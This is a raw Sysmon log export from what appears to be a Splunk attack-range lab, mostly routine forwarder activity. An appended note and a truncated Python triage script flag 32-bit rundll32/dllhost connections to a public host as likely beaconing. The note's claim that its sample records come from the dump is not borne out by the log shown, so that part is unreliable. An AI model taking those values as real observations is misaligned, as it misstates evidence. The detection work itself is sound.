17:30:19.294{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530904Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:19.294{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AED47BFB7E64C90973F537D59F2FC12E,SHA256=2DBF45C42AA9A4CDF2F19FAB287680713AAF910677A0A0812949A64F51D05DFEfalsefalse - insufficient disk space 354300x80000000000000001061115Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:14.712{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1296-false10.0.1.12-8000- 23542300x80000000000000001061114Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.070{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27C77FCFC82127C48DA2EF1C28869E00,SHA256=36F272E7949D6B2837EE1D480DCF98E64D63022956511C67ABA45A626FEDC756,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061113Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:19.049{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061112Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.049{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001061111Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:19.038{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E263B68F9CF753AC357C7128A2F7E96A,SHA256=32EC51B6B205E31A63AAC6E43C9F852218D3FF8995DC307707B713556C4B68A4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001530908Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:20.297{21761711-8437-607D-CE00-00000000BB01}2032C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530907Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:20.297{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45380C6A089CAC6877383A3FD3DFFAB2,SHA256=2E991886F66D5763B4CF50CADEC41EDAAC78510A13403982455B399D89268A22falsefalse - insufficient disk space 10341000x80000000000000001061127Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.948{761B69BB-612C-6080-985C-00000000BA01}23686972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061126Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.807{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061125Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061124Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061123Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061122Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:20.805{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061121Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-818A-607D-0500-00000000BA01}408412C:\Windows\system32\csrss.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061120Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061119Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.804{761B69BB-612C-6080-985C-00000000BA01}2368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061118Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.079{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5A4E12E1B72A331A49B564700F28826,SHA256=D289A9E006A32039BFD53E3D11A1A8C7ADC4AC089074AF2C3B76CDA8935DD9E6,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001061117Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.050{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061116Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:20.050{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530910Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:21.330{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001530909Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:21.330{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=675AED429348D8189FAC0BCA98881E04,SHA256=756D57E0E13EC0A38B52AA4918247E63BE8A4416E601DEB743602363542E38D1falsefalse - insufficient disk space 10341000x80000000000000001061148Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.983{761B69BB-8200-607D-A500-00000000BA01}43443804C:\Windows\system32\conhost.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061147Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061146Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061145Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061144Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
17:30:21.981{761B69BB-818C-607D-0C00-00000000BA01}8446096C:\Windows\system32\svchost.exe{761B69BB-819C-607D-2700-00000000BA01}2816C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001061143Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.980{761B69BB-818A-607D-0500-00000000BA01}408424C:\Windows\system32\csrss.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001061142Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.980{761B69BB-8200-607D-A100-00000000BA01}41483464C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001061141Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.979{761B69BB-612D-6080-9A5C-00000000BA01}6716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061140Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:21.820{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2C06EE18AA7ED4217F8AAF73121B041,SHA256=8F484C24239BDFB60469E12ADC5DB6854D0D211F39EDB701A7F2270BC71CD3AF,IMPHASH=00000000000000000000000000000000falsetrue 
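Two of the record types in this dump carry detail that is easy to miss in the flattened export: the Event ID 13 registry writes from Explorer.EXE land under the UserAssist\{...}\Count key, whose value names Windows stores ROT13-encoded (so "Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15" is an Office WINWORD entry), and the Event ID 3 records include 32-bit rundll32.exe and dllhost.exe, running as the local Administrator, initiating HTTPS to a public EC2 address, plus one connection Sysmon could not attribute to any process. The following triage script is an added example and is not part of the original log, of attack_range, of Sysmon or of Splunk. The sample records are constructed for this example from field values visible in the dump, keyed by Sysmon's own field names; the list of "suspect when 32-bit" host binaries and the public-address test are this example's own assumptions, and the output is a hunting lead, not a verdict.

```python
"""Triage of Sysmon Event ID 13 (UserAssist registry writes) and Event ID 3
(network connections) of the kind shown in this log dump.

Added example; not part of the original page, attack_range, Sysmon or Splunk.
SAMPLE_EVENTS is constructed for this example from field values visible in the
dump; the keys follow Sysmon's own field names (Image, TargetObject, ...).
"""
import codecs
import ipaddress
from typing import Dict, List, Tuple

USERASSIST_MARKER = "\\Explorer\\UserAssist\\"
# Assumption of this example: 32-bit copies of these Windows hosts talking to the
# internet are worth a look; extend or narrow the set for your environment.
WOW64_HOSTS = {"rundll32.exe", "dllhost.exe"}

# Constructed sample records (values taken from the dump, keys per Sysmon schema).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "13", "EventType": "SetValue", "Image": "C:\\Windows\\Explorer.EXE",
     "TargetObject": ("HKU\\S-1-5-21-3386589612-1946705271-3951022823-500\\SOFTWARE\\Microsoft"
                      "\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
                      "\\Count\\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15")},
    {"EventID": "13", "EventType": "SetValue", "Image": "C:\\Windows\\Explorer.EXE",
     "TargetObject": ("HKU\\S-1-5-21-3386589612-1946705271-3951022823-500\\SOFTWARE\\Microsoft"
                      "\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}"
                      "\\Count\\HRZR_PGYFRFFVBA")},
    {"EventID": "3", "Image": "C:\\Windows\\SysWOW64\\rundll32.exe", "User": "WIN-HOST-5\\Administrator",
     "Protocol": "tcp", "Initiated": "true", "DestinationIp": "34.218.235.219", "DestinationPort": "443"},
    {"EventID": "3", "Image": "C:\\Windows\\SysWOW64\\dllhost.exe", "User": "WIN-HOST-5\\Administrator",
     "Protocol": "tcp", "Initiated": "true", "DestinationIp": "34.218.235.219", "DestinationPort": "443"},
    {"EventID": "3", "Image": "<unknown process>", "User": "-",
     "Protocol": "tcp", "Initiated": "true", "DestinationIp": "185.199.111.133", "DestinationPort": "443"},
    {"EventID": "3", "Image": "C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream"
                              "\\windows_x86_64\\bin\\streamfwd.exe",
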